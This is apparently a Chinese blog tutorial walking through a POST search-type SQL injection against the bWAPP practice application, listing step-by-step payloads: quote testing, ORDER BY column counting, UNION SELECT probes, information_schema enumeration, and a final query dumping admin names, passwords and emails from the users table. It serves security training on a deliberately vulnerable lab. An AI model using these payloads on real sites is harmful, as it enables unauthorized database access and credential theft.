1POST 型注入就要先找到 POST 参数, 在搜索框输入 1 后提交, 按 F12 查看审查元素, 找到网络, 再点击 POST 项, 接着点击右边的参数, 查看 POST 的参数为 title, 如下图:
2 开始构造, 在 hackbar 的 POST 栏里输入 title=1', 提交, 返回的报错含有 %, 所以可以确定是搜索型注入结果如下图:
输入 title=1%'and'%'=', 没有报错, 说明是搜索型注入, 结果如下图:
3 判断字段数:
输入 title=1%'order by 7 #+ 正常; 输入 title=1%'order by 8 #+ 报错, 说明字段数为 7, 这里注释用 #正常, 用 -- 会报错, 我不知道为什么, 结果如下图:
查看显示位置, 输入 title=1%'union select 1,2,3,4,5,6,7 #+, 结果如图:
4 查询数据库等信息:
输入 title=1%'union select 1,database(),version(),4,user(),6,7 #+, 查询数据库名数据库版本当前用户, 结果如图:
5 查询表名:
输入 title=1%'union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp' #+, 较重要的是 users 表, 结果如图:
6 查询字段名:
输入 title=1%'union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='users' #+, 较重要的字段名有 adminpasswordemail, 结果如图:
7 查询字段内容:
输入 title=1%'union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users #+, 结果如图:
来源: http://blog.51cto.com/13577444/2092108